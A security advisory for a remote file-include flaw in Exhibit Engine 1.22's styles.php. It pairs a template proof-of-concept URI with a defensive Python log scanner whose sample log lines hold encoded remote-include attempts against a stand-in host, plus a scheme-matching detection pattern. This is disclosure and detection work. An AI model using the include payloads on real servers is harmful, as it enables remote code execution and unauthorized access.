Exhibit Engine Styles.PHP Remote File Include Vulnerability
BID:21313
Info
| Bugtraq ID: | 21313 |
| Class: | Input Validation Error |
| CVE: | CVE-2006-7183 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 27 2006 12:00AM |
| Updated: | Jul 06 2016 02:40PM |
| Credit: | Kacper is credited with the discovery of this vulnerability. |
| Vulnerable: | Exhibit Engine Exhibit Engine 1.22 |
| Not Vulnerable: | |
Discussion
Exhibit Engine is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
A successful exploit of this issue allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Exhibit Engine 1.22 and prior versions are vulnerable to this issue.
Exploit / POC
An attacker may exploit this issue using a web client.
The following proof-of-concept URI is available:
http://www.example.com/[ee_path]/styles.php?toroot=[evil_scripts]
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
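With no vendor patch listed, one defensive check is to search web server access logs for the request pattern shown in the proof-of-concept URI: a request to styles.php whose toroot parameter names a remote resource. The following Python is an added example, not part of the original advisory or of Exhibit Engine; the log lines are constructed, and the function names and the list of flagged schemes are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (combined log format); hosts and paths are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Nov/2006:10:00:01 +0000] "GET /ee/styles.php?toroot=http://remote.example/inc.txt HTTP/1.1" 200 512
203.0.113.5 - - [27/Nov/2006:10:00:02 +0000] "GET /ee/styles.php?toroot=%2568ttp%253A%252F%252Fremote.example%252Finc HTTP/1.1" 200 512
198.51.100.7 - - [27/Nov/2006:10:00:03 +0000] "GET /ee/styles.php?toroot=../ HTTP/1.1" 200 2048
198.51.100.7 - - [27/Nov/2006:10:00:04 +0000] "GET /ee/index.php?toroot=http://remote.example/ HTTP/1.1" 404 0
"""

REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Assumed list: URL schemes and PHP stream wrappers that make an include path non-local.
REMOTE = re.compile(r"(?:https?|ftps?|php|data|expect|zip|phar):", re.I)

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (bounded, so hostile input cannot loop)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_toroot(line):
    """Return the decoded toroot value when the line requests styles.php with a
    toroot parameter that names a remote or wrapper resource, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/styles.php"):
        return None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        value = fully_decode(value).strip()  # parse_qsl already decoded once
        if name == "toroot" and REMOTE.match(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged line."""
    found = ((n, suspicious_toroot(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in found if v is not None]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG.splitlines()):
        print(f"line {number}: toroot -> {value}")
```

The scan flags only remote or wrapper values; a relative toroot value such as the third sample line is not reported and would need separate review.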
References
References:
- Exhibit Engine Web Site (Exhibit Engine)